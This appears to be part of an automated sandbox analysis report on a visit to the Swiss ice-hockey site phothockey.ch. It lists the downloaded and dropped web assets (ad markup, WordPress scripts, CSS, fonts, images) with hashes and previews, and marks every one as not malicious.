                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5534394335622311&output=html&adk=1812271804&adf=3025194257&abgtt=6&lmt=1736177823&plat=1%3A16777216%2C3%3A16%2C4%3A16%2C9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A1081344%2C32%3A32%2C41%3A32%2C42%3A32&format=0x0&url=https%3A%2F%2Fphothockey.ch%2F&pra=5&wgl=1&aihb=0&aiof=3&asro=0&ailel=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aiael=1~2~3~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aifxl=29_18~30_19&aiixl=29_5~30_6&aiapm=0.3221&aiapmi=0.33938&aiombap=1&aief=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1736177823279&bpp=23&bdt=2580&idt=293&shv=r20241212&mjsv=m202412090101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D271b0c5861eb301c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MbbkKdxZ3r4oXe0CAZ1aXtk3TXpXw&gpic=UID%3D00000fa80f72307c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MYYYAF9Bdmqy81LoPXnol1uur86yA&eo_id_str=ID%3Dcfbf4971db1f6709%3AT%3D1736177771%3ART%3D1736177771%3AS%3DAA-AfjaNDk_NqCEVnmF5j0CX-A32&nras=1&correlator=3048303595490&frm=20&pv=2&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=-12245933&ady=-12245933&biw=1280&bih=907&scr_x=0&scr_y=0&eid=31088580%2C95344789%2C95347433&oid=2&pvsid=3658152886269661&tmod=1523322118&uas=0&nvt=2&fsapi=1&fc=1920&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&cms=2&fu=32768&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=1&uci=a!1&fsb=1&dtd=422
                                                                                                                                            Preview:<script>window.sra_later_blocks = [];</script><script>window.sra_later_blocks.push({creative:'\x3c!doctype html\x3e\x3chtml \x3e\x3chead\x3e\x3cstyle\x3e* {margin: 0;padding: 0;outline: none;}body {background: rgba(52, 58, 65, 0.600000);backdrop-filter: blur(15px); /*potential issue: minimal browser support*/-webkit-backdrop-filter: blur(15px); /*for safari*/height: 100%;}#ad_iframe {box-shadow: 0 !important;display: block;left: auto;margin: 0 auto;position: relative;top: auto;}.creative {transition: opacity 1s;-webkit-transition: opacity 1s;position: relative;}#card {background-color: #fff;border-radius: 6px;padding: 0 6px 1px;position: relative;box-shadow: 0px 8px 12px rgba(60, 64, 67, 0.15), 0px 4px 4px rgba(60, 64, 67, 0.3);}html {height: 100%;}.toprow {width: 100%;display: table;height: 24px;background-color: #fff;}.btn {display: table;transition: opacity 1s, background .75s;-webkit-transition: opacity 1s, background .75s;-moz-transition: opacity 1s, background .75s;-o-transition:
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):64
                                                                                                                                            Entropy (8bit):4.492897276113269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:C0DDB93C144B94DA946DC9F727D05538
                                                                                                                                            SHA1:517BA8265D63543D2F4F2D3E2247A9A9CEE79E9D
                                                                                                                                            SHA-256:4760B35732ACF6B7C363E144C5FD126EAFEE7315885510FEAF23B0D53938D33F
                                                                                                                                            SHA-512:FE7BBEF81355A517C2124C01EBA6CB7460E36F0E608849E37721C23B53FE1C9349CBE949016BCD2CABF97629AAB127CC6318B5EC4F6ED87BDB2982580843AD73
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISLAn9uqUg1dGU6RIFDRVQj_4SBQ1a3e0uEgUNUopJoxIFDUC-9V0SBQ1AWQ9b?alt=proto
                                                                                                                                            Preview:Ci0KBw0VUI/+GgAKBw1a3e0uGgAKBw1SikmjGgAKBw1AvvVdGgAKBw1AWQ9bGgA=
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1372), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1372
                                                                                                                                            Entropy (8bit):5.05732581305757
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DBEF20CD8DF4EC55C0590F24E3375DD3
                                                                                                                                            SHA1:6144B498324C4E8A41124C9D3969EF22A83DBF2C
                                                                                                                                            SHA-256:FD88099D63244EE9FF52845D2C23E6DF92F3359B09AEEA874F10A61A18F5E8EE
                                                                                                                                            SHA-512:9EBE46998BFA00B359413E130A8E193166C5640CB53938307D1BDE7C01035515CDCB329AB298213F71D3392BA6E248889C317D3EA108EDB82EFB2D71FA856688
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:!function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="",r(r.s=400)}({400:function(e,t){const r=document.querySelectorAll(".blockspare-block-animation");if(
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (13490)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):13579
                                                                                                                                            Entropy (8bit):4.962311390458636
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8D57D79E602005F22E75DC26DCAC53CA
                                                                                                                                            SHA1:0C02ECF51A718B5CEBED2532EA3F999C27B4B4D6
                                                                                                                                            SHA-256:5DDA95FFDB33652F7B4B82539EEEB3E88B9FDEA389028C2D572F4C1AED2A511F
                                                                                                                                            SHA-512:9BCC1E07805CC82E7D2291ECD18CCD101AC2EA506EEB47149967D59862FD110E99DBE3C20FE929741584ACF3477D0F68D2BCEEA4941FF0B19D5C86FF349F7D31
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/sports-leagues/vendor/modaal/modaal.min.css?ver=0.13.6
                                                                                                                                            Preview:/*!..Modaal - accessible modals - v0.4.4..by Humaan, for all humans...http://humaan.com. */.modaal-noscroll{overflow:hidden}.modaal-accessible-hide{position:absolute!important;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);padding:0!important;border:0!important;height:1px!important;width:1px!important;overflow:hidden}.modaal-overlay{position:fixed;top:0;left:0;width:100%;height:100%;z-index:999;opacity:0}.modaal-wrapper{display:block;position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999;overflow:auto;opacity:1;box-sizing:border-box;-webkit-overflow-scrolling:touch;-webkit-transition:all .3s ease-in-out;transition:all .3s ease-in-out}.modaal-wrapper *{box-sizing:border-box;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;-webkit-backface-visibility:hidden}.modaal-wrapper .modaal-close{border:none;background:0 0;padding:0;-webkit-appearance:none}.modaal-wrapper.modaal-start_none{display:none;opacity:1}.modaal-wrapper.modaal-start_fade{opacity:0}.modaa
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):4154
                                                                                                                                            Entropy (8bit):7.8751467256243295
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:78FB87A443E9EDB234F177F3965709F9
                                                                                                                                            SHA1:D2FE3D935787959FE6CC2E140DE9D3C6122EA80F
                                                                                                                                            SHA-256:7BD70716867E8794C8C325DDE10D6342B45C7EA26ED6D354B40B88F0A7BFA130
                                                                                                                                            SHA-512:AC2577F3FCCB6BDA6418B4A8F6971957AABAFE72456F1C493A69A4605A3DD520544A69A4313D2BED3C57C29B2CE2A48DE531BC9F999DAEBADA2D291561F89CF6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/11/IMG_2925.jpg
                                                                                                                                            Preview:RIFF2...WEBPVP8X...........Y..VP8 R...P8...*..Z.>.:.H%."!49l...j..C,..h..|w.].R...cm....XoG_...=.:W?......X.7.>D...>E...;.|^.g.V.^..e.......z..?@.f>....S.|..N.....g.?.{.~..3.B.......?.?..~..*./..798]...;..Us.,h..)....j....7......~T6..%.%l..X*...'-.^d....*@x3$ .}.g.../..6...(.Ba..L&w.!a..|..91..CVu..lL....~{..8...tLJ@.\w(U.../M.b6...>7 ..;..dbO...[3......?s....z......6...._..v.i1../..4.^...W.g.SN.rc.."..V...s(..A..1...L...$..d.N.yO.D.E...S...!?..1q.N.|...r.DT...Q(..TJ..........#a.Y......w....A...M".X..Ig.....Z.|!DX. ..9.?..X.+..U(......_..r .....$....w6<.e.....0...En...&.A.l.....q...V...'.E~...*. ...*..f._M..C.j..'-.....sa.q..^8...e-..6h...K..\.....2.]..y.t?.Q.........-Y.Z#.9.nzAj.,y_H....Xln.....3..|.T....F2x..._......9./..[......u6p.u'^.....D.:...}/............%Q!6.%.G.!o.OF..$.W...."t......=..*.I.w}...n.?.W.._..0l.....e; i...:...S.l(...&.o..q979+j.-......j..m.......W...d<u&.R@.7..$*.Qd......,e65`........Bcx.M.'f..7X.........o...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14360
                                                                                                                                            Entropy (8bit):7.950681162801288
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:AD20A839215281CEFA4B74D8BF3096F1
                                                                                                                                            SHA1:1C9B6C383328AD6AE2B7063F373C95A76FD4A3A2
                                                                                                                                            SHA-256:4570CA311506645534925CBA3854086DDFDD73AF4C4A081A766970FD41E54ECC
                                                                                                                                            SHA-512:A0E951ED01A051513F73244E858B99D482ADF32570236539CB66382795035311FC943B03F69BE9E970BB2DB491259C09C39721F38080C51A9D59880A9AD197C5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z.......C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z..............."..............................................................................3N....._7Z...l........8.f...g./.j.^[..xFT..{i.9...S..u.).~...B.Y.,G4R.%j.`..X.ou.N.....o.....W..j.z...."I.$.[q-..F.=`Rx.."V.Lg.).~.."...........<3x.A...p.6...-e_N..0.G...2.....J6...*...x.Ri..I..n..oW...b.7?...z...z.......[..d\.2....mU..b.pMf.....@rL..z..$.^p..^......_u..r.[...y5.`...,.......4/I.R.,.=S.f..)..GW.Ta.....9..[F....~.vB.!..q.WY;.z..Z.B..(.]j.e.. G..O..&.`[......+^.}n....j....D.cU\O.TM.:C..[9l.f6..L....g..V.9........[k&_)..[....n....2-..&..<.Ha...0..>.n8kn.. :.....p......z.6.....2C..c6g.r...k..O.j5PK2]......xI.h.m1Z.z.V..j.>...e..!s.R.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (22367), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):22367
                                                                                                                                            Entropy (8bit):5.542626302580642
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B0B46B807EEE39AF0AAD8F5FEFC9B3A2
                                                                                                                                            SHA1:0FB04F15599BC0844063A6AB776C86E73CB9FBFC
                                                                                                                                            SHA-256:71CA2652E2B3FFD3C0EC966958604714CE6C7AF01D961B44ADC438518EB58CB3
                                                                                                                                            SHA-512:4EEC49904A5480940124A1C1B9C9DAE764EBB115829CBCE4356E66A1D7F077DFD204A4634B0622FFB14CC6EBFF7062D7F30502BF0BC7D998A1A55FC8C876DA8E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://www.gstatic.com/_/translate_http/_/ss/k=translate_http.tr.26tY-h6gH9w.L.W.O/am=DAY/d=0/rs=AN8SPfrCcgxoBri2FVMQptvuOBiOsolgBw/m=el_main_css
                                                                                                                                            Preview:.VIpgJd-ZVi9od-ORHb-OEVmcd{left:0;top:0;height:39px;width:100%;z-index:10000001;position:fixed;border:none;border-bottom:1px solid #6B90DA;margin:0;box-shadow:0 0 8px 1px #999}.VIpgJd-ZVi9od-xl07Ob-OEVmcd{z-index:10000002;border:none;position:fixed;box-shadow:0 3px 8px 2px #999}.VIpgJd-ZVi9od-SmfZ-OEVmcd{z-index:10000000;border:none;margin:0}.goog-te-gadget{font-family:arial;font-size:11px;color:#666;white-space:nowrap}.goog-te-gadget img{vertical-align:middle;border:none}.goog-te-gadget-simple{background-color:#FFF;border-left:1px solid #D5D5D5;border-top:1px solid #9B9B9B;border-bottom:1px solid #E8E8E8;border-right:1px solid #D5D5D5;font-size:10pt;display:inline-block;padding-top:1px;padding-bottom:2px;cursor:pointer}.goog-te-gadget-icon{margin-left:2px;margin-right:2px;width:19px;height:19px;border:none;vertical-align:middle}.goog-te-combo{margin-left:4px;margin-right:4px;vertical-align:baseline}.goog-te-gadget .goog-te-combo{margin:4px 0}.VIpgJd-ZVi9od-l4eHX-hSRGPd,.VIpgJd-ZVi9od-
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (58981)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):59016
                                                                                                                                            Entropy (8bit):6.036924444025019
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D68D6BF519169D86E155BAD0BED833F8
                                                                                                                                            SHA1:27BA9C67D0E775FC4E6DD62011DAF4C3902698FC
                                                                                                                                            SHA-256:C21E5A2B32C47BC5F9D9EFC97BC0E29FD081946D1D3EBFFC5621CFAFB1D3960E
                                                                                                                                            SHA-512:FD0956D1A7165E61348FDA53D859493A094D5A669AA0BA648BE3381B02ED170EFD776704AF6965F1E31143F510172EE941D4F2FC32C4751D9B8763B66301486D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-includes/css/dashicons.min.css?ver=6.7.1
                                                                                                                                            Preview:/*! This file is auto-generated */.@font-face{font-family:dashicons;src:url("../fonts/dashicons.eot?99ac726223c749443b642ce33df8b800");src:url("../fonts/dashicons.eot?99ac726223c749443b642ce33df8b800#iefix") format("embedded-opentype"),url("data:application/x-font-woff;charset=utf-8;base64,d09GRgABAAAAAHvwAAsAAAAA3EgAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABHU1VCAAABCAAAADMAAABCsP6z7U9TLzIAAAE8AAAAQAAAAFZAuk8lY21hcAAAAXwAAAk/AAAU9l+BPsxnbHlmAAAKvAAAYwIAAKlAcWTMRWhlYWQAAG3AAAAALwAAADYXkmaRaGhlYQAAbfAAAAAfAAAAJAQ3A0hobXR4AABuEAAAACUAAAVQpgT/9mxvY2EAAG44AAACqgAAAqps5EEYbWF4cAAAcOQAAAAfAAAAIAJvAKBuYW1lAABxBAAAATAAAAIiwytf8nBvc3QAAHI0AAAJvAAAEhojMlz2eJxjYGRgYOBikGPQYWB0cfMJYeBgYGGAAJAMY05meiJQDMoDyrGAaQ4gZoOIAgCKIwNPAHicY2Bk/Mc4gYGVgYOBhzGNgYHBHUp/ZZBkaGFgYGJgZWbACgLSXFMYHD4yfHVnAnH1mBgZGIE0CDMAAI/zCGl4nN3Y93/eVRnG8c/9JE2bstLdQIF0N8x0t8w0pSMt0BZKS5ml7F32lrL3hlKmCxEQtzjAhQMRRcEJijhQQWV4vgNBGV4nl3+B/mbTd8+reeVJvuc859znvgL0A5pkO2nW3xcJ8qee02ej7/NNDOz7fHPTw/r/LnTo60ale4ooWov2orOYXXQXPWVr2V52lrPL3qq3Wlmtq
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 24984, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):24984
                                                                                                                                            Entropy (8bit):7.992209564589015
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:303A79D404D97CCBB3D803088FC387D8
                                                                                                                                            SHA1:66E3525B79A1A58A63FE0934F31676DD40C7F033
                                                                                                                                            SHA-256:7E510E61C497D334DA21ECCDA06DF5D3A428C9EA94D6903B6138E7C7255ABA0F
                                                                                                                                            SHA-512:5751D97634F0FD270E36044A1EF077C0EC1D9B146BD8E5D28207A083CB350FA467E083433C2F81CFF896AC7E3756B7014A408FEB203F2D175FDEBA0A37F3614E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTUGmu1aB.woff2
                                                                                                                                            Preview:wOF2......a...........a...............................j?HVAR.V.`?STAT.$'....+...|.../V....`.D..j.0..T.6.$..>. ..~.......'...6.Yw.....=W.y.DL.4.a.&)....N.!C.n..R.....".".P..=.#.L........62....2...e.z.V..U...r.H.Y.T.ZdkK...#ux3*,..&.I..dcb.[.>.....)g9up..f4.p..D.l...V..iEl.A..e....z.S..v.......c?.<..w...{V.9..C.=0MsF..o9......[.3...K..'...`....HA....b5..ms.l+.t....a...^......m.[..*.8.....A.DR@.3P..F0. ...s..XT}T. .......MzK(.FX..3<m..o.!..z....."..]3.e$ .X...Y.f].n7.([....{....@......sxC....8...9q........XJ........&m..e...M.. . A.B..!!x..AK}.i;Q.[.........N;..u.A...w9qA..4...I..q..e...o.....C.UVW.}.rn.x.W.8.kP.C<..{.3o.G&U.......25..3.../..k..uK..BB......(D....?....xgf...8...U)..Y%j.p.2....^....Q..!...".......a...P.../m.w&<.....R.1..FZ]H.8):.3...\...wV.P........K..@.j..C.:..jE..L...R.Z..@.<....y-_hsj.+J`....i. ..Ba.S..4...|o@.R.R..8.!..t.3y!U!J..X.....*...i..+..P.X..M...K5..fgF+.F..V.! .....X.B.......*..i.]..m.......*..`[>.q..m..w.......fC<
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2306
                                                                                                                                            Entropy (8bit):7.764400960289258
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:AD481D556D3B17E030BF99A2133D6AC3
                                                                                                                                            SHA1:CAA5E534BBD3D132651616A9594F82C63E47117F
                                                                                                                                            SHA-256:96FF416A4ACCF0953E7678ED91DFAE5B9B2B84EFE14FB839C35C4F59D4D8068E
                                                                                                                                            SHA-512:D8AF8637AE44866EE17EFEAF4AF54E7E7411881ECB523CADBAC028DC3169147748140F53250E4DF4D5F04961ED781E00262C146CE1F8429A75654E0433EEA888
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_5061.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 ....P(...*..Z.>.F.K...!..=@...c...V-...../.;.. ...Er.\......c..XQ/NJ;-.!!Aq.5b.W.d..T..~v/r.b.......M....$N6.pW......Z....$.7..s5#d..I....Tkt...nV.}.<.9m:..H"J..V.c.P...5.}..9.../..I.8...$9...D.....l.R:s:......,....}....1`..*.F..9.....cZ.G... &.n./F.Z.....<)..T..D[...2.....4.D....86.R.=qGY.7.s...\k.}..)..............X....b...ch...0R-.c.@R....B....UHUSx..b;..s..ks..t&.Y..%..#...;8S.4...v....o.Cx.HS4.Ir....../..MT..$..}......|..6S.P..I.(..(.x..C..M4.g......2{LN.l.4.t].g.p}I..E..E..<|...(...o.)...T.......kr_..cM....r...zT(.v...5...[*...h..<..'.....Z...........}..>2U...o1..OtE.<;.c...Q{..1..}Tz.....H.......y.-..o.Vj.M_...6&....+k4.h.n."D\u._m..|...........;%......:[?9J....m.....@....E.t.3o...6.....`.Z.f.:m.4... ....q/... P..I.8..].=.^A.|...l*$....?!.'.....8...l.IcQ..,h..............n..J),+W.B..Xp..)-. .@.2..2........h.:T.U...z._!2ox... ...^.I9.M.F.H.t............2.e..-...x.u..Ms..RC......D.4..z>.K..+.(.{..;.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 600x417, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):34249
                                                                                                                                            Entropy (8bit):7.978463003332888
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:79B94AE8965ED376AFDABE398186D9C4
                                                                                                                                            SHA1:2C8228C6CCF5A105B3CF4CC782CC8485C7D46BF2
                                                                                                                                            SHA-256:C05A1F3336DB2B33E806EEA7320A6699B93C987912D3B3FB88B2C765D37B0DB9
                                                                                                                                            SHA-512:2B386168B76A98861BA06AADE85BAC40C01EFD671BA69B039A85C6FE043352CE10F180DAC0FD6286BE1F19F3AE75E71B790725073EFFBAC5EE6BF0E713B89AE9
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................X......................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.........X.."................................................................................z.L.......g.U...#.y.w...L.T.#:..w.'<.r3.G./..-...X5.]$.a.#...P."gu.\4b..k..nQO.K....L..NJ..c."..GyM..+.8.+....q!.....Q.,X...o&Xk2.k!.p...E.... V..m....z..gwy.R..y..R.Y2.\.......Hv..e.r.)y]&...M./..2.E..x..J\$&w+cW....quNf.m.q.U....I.........y...,...p.......g.dl....8&.+.......(...;d..d.2.!..X........R<.;+......3..&...L.SQ[<.i..a..dXu..v.aA++.-DWa....u.S8m[..q.u.....#Q{.....kM.~_.#sH:7A..r:."I.|.Y"j.g.R.QD.....eRI..,....N....b.z.UPV.-L}.%+.%.k....\,.F..>w..Q...........n...5.s...D.NgWC.S..E..9.,.N.....y.H..NN......sl.=..O+R...p....u......v....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 800x445, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49866
                                                                                                                                            Entropy (8bit):7.978254628461401
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:57A40329BD72D044ED4B62DEBEFBDC2F
                                                                                                                                            SHA1:2B0DC565076DFAA6DD40DEE36B261C944EFC965D
                                                                                                                                            SHA-256:B6624BC2DFD3840EF93D1EA2A0BB2F5AE819FDD8ACDD8D38D3AEA802B2502F74
                                                                                                                                            SHA-512:A381DC0760147B78A6D7E1B9851C74916D01AD8DAD3BB283B5335E8FC22DC706E956E8BA22EF5DC9AEBAAC1532FCFE5FB2CBDE58DEAFB305B601AB643D064340
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ......................C.............................'......'#*" "*#>1++1>H<9<HWNNWmhm......C.............................'......'#*" "*#>1++1>H<9<HWNNWmhm........... ..".................................................................................".n.}/C.N(.^..._W..S?).....]..6s..tZ.3^y3D.6.4._...%..[..zk.a.Z."....C.J...9..5..G.<../...Rg.k.e...H..^bj./.x.g..Elf.k./..0....2}M..?.E.......&......t.}".h.k.o]v..8z:.1.}].....|}.9....c.v/=.$......Q.].T|.33M.,P..)8.V~z..~.-.(#...MqS...[D<M.c..s....Ajzn...D....P'".u>Y..........O..5:|.......^.+..Z..y5.....)..........)N2t......!`.W....}.5...(64..D.<..F]t\...b..m|.v...l.e/.v.I6F.I..M.......<=.=G#..zSj.r.y.../.q...?......_W.]..g..L....e..FX.I^.8....}Wp..3...-..2..#...+..f.&..D..!..6.(.S.RE.......oT+.V..K......>.)y..G..=..a.v.u.v..1.\.l..@.Y..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (14196)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14235
                                                                                                                                            Entropy (8bit):5.117056250970052
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A3F0669BDDEF1C4B6D8AB2C136BB4F3B
                                                                                                                                            SHA1:80AD5D7C91FA3A9858C7E718573D84331F710F31
                                                                                                                                            SHA-256:C021A94DB9B98EF2269716A2E77AFF78D691EF4D4D92911F566528FA2E3DD447
                                                                                                                                            SHA-512:A62FED1E4FBD310B45D1E81F2AB21578AFF23DF4AF9F38C9679AD8C74946F8303498154830A38EC40ABD2972CE70CCD165FB7B09FDC4DEA41ABE8A0368BF6FBA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:/*! elementor - v3.5.6 - 28-02-2022 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[354],{7914:e=>{e.exports=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}},e.exports.default=e.exports,e.exports.__esModule=!0},381:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=(e,t)=>{t=Array.isArray(t)?t:[t];for(const n of t)if(e.constructor.name===n.prototype[Symbol.toStringTag])return!0;return!1}},8135:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.ViewModule{getDefaultSettings(){return{selectors:{elements:".elementor-element",nestedDocumentElements:".elementor .elementor-element"},classes:{editMode:"elementor-edit-mode"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$elements:this.$element.find(e.elements).not(this.$element.find(e.nestedDocumentElements))}}getDocumentSettings(e){let t;if(this.isEdit){t={
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):361
                                                                                                                                            Entropy (8bit):4.773172939792637
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:09D80DD7597C2399B3F81616831E5484
                                                                                                                                            SHA1:7EED95FBE6204F8FD0711E3B4ADDDE732D8B5FAC
                                                                                                                                            SHA-256:A6882AD6252B258CEE0A6D07B435443EA2727F138FAE89ADFFB1E820CB9C7BBB
                                                                                                                                            SHA-512:4ACC1B09F28A303E66E3EAA8E7AB2E10395503269EAAC3FD11042F58CBD515C7297190B5AA875EE079F6A228C4837B75E6C48C13ADE5BA91B09894CCE934A255
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:{"channels":[{"name":"cus_wintersports"},{"name":"IAS_3022155_PG"},{"name":"ctx_sports"},{"name":"IAS_3006644_PG"},{"name":"cus_wintersports-resort"},{"name":"IAS_3005205_PG"},{"name":"IAS_1510294_PG"},{"name":"cus_eishockey"},{"name":"IAS_3005177_PG"},{"name":"IAS_3010460_PG"},{"name":"ctx_entertainment"},{"name":"IAS_3005061_PG"},{"name":"IAS_3010248_PG"}]}
